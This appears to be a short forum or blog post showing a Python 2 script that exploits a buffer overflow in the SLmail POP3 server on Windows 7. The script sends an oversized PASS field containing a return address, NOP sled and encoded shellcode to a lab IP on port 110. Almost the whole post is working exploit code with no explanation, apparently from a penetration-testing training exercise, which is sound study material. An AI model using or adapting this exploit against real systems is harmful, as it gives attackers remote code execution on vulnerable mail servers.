Exploiting Windows 7 | Using python script | Slmail server exploit

danger@kali:~/Desktop/python$ cat slmail-pop3.py

#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shellcode=("\xda\xc6\xd9\x74\x24\xf4\x5e\xb8\xb6\x77\xf7\x09\x31\xc9\xb1"
"\x54\x83\xc6\x04\x31\x46\x14\x03\x46\xa2\x95\x02\xf5\x22\xdb"
"\xed\x06\xb2\xbc\x64\xe3\x83\xfc\x13\x67\xb3\xcc\x50\x25\x3f"
"\xa6\x35\xde\xb4\xca\x91\xd1\x7d\x60\xc4\xdc\x7e\xd9\x34\x7e"
"\xfc\x20\x69\xa0\x3d\xeb\x7c\xa1\x7a\x16\x8c\xf3\xd3\x5c\x23"
"\xe4\x50\x28\xf8\x8f\x2a\xbc\x78\x73\xfa\xbf\xa9\x22\x71\xe6"
"\x69\xc4\x56\x92\x23\xde\xbb\x9f\xfa\x55\x0f\x6b\xfd\xbf\x5e"
"\x94\x52\xfe\x6f\x67\xaa\xc6\x57\x98\xd9\x3e\xa4\x25\xda\x84"
"\xd7\xf1\x6f\x1f\x7f\x71\xd7\xfb\x7e\x56\x8e\x88\x8c\x13\xc4"
"\xd7\x90\xa2\x09\x6c\xac\x2f\xac\xa3\x25\x6b\x8b\x67\x6e\x2f"
"\xb2\x3e\xca\x9e\xcb\x21\xb5\x7f\x6e\x29\x5b\x6b\x03\x70\x33"
"\x58\x2e\x8b\xc3\xf6\x39\xf8\xf1\x59\x92\x96\xb9\x12\x3c\x60"
"\xbe\x08\xf8\xfe\x41\xb3\xf9\xd7\x85\xe7\xa9\x4f\x2c\x88\x21"
"\x90\xd1\x5d\xdf\x9a\x45\x9e\x88\x56\x1e\x76\xcb\x68\x21\x3c"
"\x42\x8e\x71\x12\x05\x1f\x31\xc2\xe5\xcf\xd9\x08\xea\x30\xf9"
"\x32\x20\x59\x93\xdc\x9d\x31\x0b\x44\x84\xca\xaa\x89\x12\xb7"
"\xec\x02\x97\x47\xa2\xe2\xd2\x5b\xd2\x92\x1c\xa4\x22\x3f\x1d"
"\xce\x26\xe9\x4a\x66\x24\xcc\xbd\x29\xd7\x3b\xbe\x2e\x27\xba"
"\xf7\x45\x11\x28\xb8\x31\x5d\xbc\x38\xc2\x0b\xd6\x38\xaa\xeb"
"\x82\x6a\xcf\xf4\x1e\x1f\x5c\x60\xa1\x76\x30\x23\xc9\x74\x6f"
"\x03\x56\x86\x5a\x10\x91\x78\x18\x34\x3a\x11\xe2\x78\xba\xe1"
"\x88\x78\xea\x89\x47\x57\x05\x7a\xa7\x72\x4e\x12\x22\x12\x3c"
"\x83\x33\x3f\xe0\x1d\x33\xb3\x39\x4b\xba\x34\xbe\x74\x3c\x09"
"\x68\x4d\x4a\x4a\xa8\xea\x45\xe1\x8d\x5b\xcc\x09\x81\x9c\xc5")
#buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" * 4 + "C" * 90

buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" *16  + shellcode + "C"*(3500-2606-4-16-360)
try:
        print "\nSending evil buffer..."
        s.connect(('192.168.205.137',110))
        data = s.recv(1024)
        s.send('USER username' +'\r\n')
        data = s.recv(1024)
        s.send('PASS ' + buffer + '\r\n')
        print "\nDone!."
except:
        print "Could not connect to POP3!"]

Reactions: